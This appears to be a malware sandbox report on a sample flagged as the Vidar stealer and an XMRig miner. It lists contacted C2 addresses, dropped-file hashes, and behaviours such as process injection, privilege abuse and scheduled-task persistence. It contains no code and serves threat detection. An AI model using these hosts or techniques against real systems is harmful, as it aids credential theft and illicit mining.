US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 1b16fe969e31beab26afc7060fba271b
SHA1 97f350235d63a11eb5bf555d1d63f8667d47fb31
SHA256 c8345b213f585dffbfc2ec8374dee34b9760c4ce5ddc02414cb90de95dd85e7e
SHA512 90e72cb53e6e983ea3a02aabbb7547873162bdcd47316126c1c7c57efa1104cb6f1f4a0bf5e418a345aba088f23a6d1a02454fb5e50c5222ecfc53fda1ace882

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe

MD5 3fce5aacf6f9eb4b34126d0c2a9d36c2
SHA1 5590c4402fcda16fe873f857088b4ee6c38858b1
SHA256 ba64bfa019840bf787c93b9f25b6fcce479be24c43a285258174a1a70b9bbf12
SHA512 ed8b38dc4af79c7271412a44ecdcb7e2df0525f314cc52b700ee2e93612c99ccad78a48b657ba5178595d133ad03ed842f4db71165a933fcba0b540f48db58d7

memory/2896-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2896-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2896-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2896-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2896-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2896-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2896-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2896-83-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe

MD5 3bf8a169c55f8b54700880baee9099d7
SHA1 d411f875744aa2cfba6d239bad723cbff4cf771a
SHA256 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2
SHA512 f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/1832-134-0x00000000008C0000-0x00000000008C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

memory/2948-111-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

memory/1072-143-0x00000000009B0000-0x0000000000A20000-memory.dmp

memory/2652-140-0x0000000000A00000-0x0000000000A16000-memory.dmp

memory/2816-139-0x0000000001300000-0x0000000001372000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PJTNEGBYNN4IUXD59UYU.temp

MD5 aeb0ebed9ca31f56d1b50221cf5c08e0
SHA1 561ed7f32a0e2bf401ec81f6ba3e7a2c0ea0dbab
SHA256 dfc707852c87f4bb93e9e9594f581517cc1f97b8ffd46191b4af279fd407cdcc
SHA512 ffa93eff2207b6af479ef1d9fda297dd4f64f3aa97a726e8dcd9c746123af3611995feb4657d7edd789dd99a2cf752e7be5b6a0bb2a6aaf250e6bceb82bcbcff

memory/2408-138-0x0000000000E30000-0x0000000000EA0000-memory.dmp

memory/1648-152-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2948-154-0x0000000000400000-0x0000000000414000-memory.dmp

memory/592-151-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

MD5 d165e339ef0c057e20eb61347d06d396
SHA1 cb508e60292616b22f2d7a5ab8f763e4c89cf448
SHA256 ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8
SHA512 da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0988d1c2bd9a37.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe

MD5 e90750ecf7d4add59391926ccfc15f51
SHA1 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1
SHA256 b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59
SHA512 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9

C:\Users\Admin\AppData\Local\Temp\is-TR5KG.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-TR5KG.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe

MD5 6b4f4e37bc557393a93d254fe4626bf3
SHA1 b9950d0223789ae109b43308fcaf93cd35923edb
SHA256 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d
SHA512 a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e

memory/2896-82-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2896-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2896-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2896-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2652-169-0x0000000000340000-0x0000000000346000-memory.dmp

memory/648-184-0x0000000001E90000-0x0000000001FED000-memory.dmp

memory/2896-193-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2896-192-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/648-194-0x0000000002A80000-0x0000000002B26000-memory.dmp

memory/2896-191-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2896-189-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2896-186-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2896-185-0x0000000000400000-0x000000000051C000-memory.dmp

memory/648-196-0x0000000002B30000-0x0000000002BC3000-memory.dmp

memory/648-195-0x0000000002B30000-0x0000000002BC3000-memory.dmp

memory/648-198-0x0000000002B30000-0x0000000002BC3000-memory.dmp

memory/2540-211-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-209-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-235-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-234-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-233-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1828-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-229-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-227-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-237-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-222-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-221-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-220-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2696-218-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-216-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-214-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-208-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-207-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2540-205-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-203-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-201-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-199-0x0000000000400000-0x0000000000422000-memory.dmp

memory/900-238-0x0000000000400000-0x0000000002DAA000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240708-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"

Signatures

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1984 set thread context of 2656 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cxl-game.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Jonba.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f78be40.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\inst2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Jonba.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2740 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
PID 2740 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
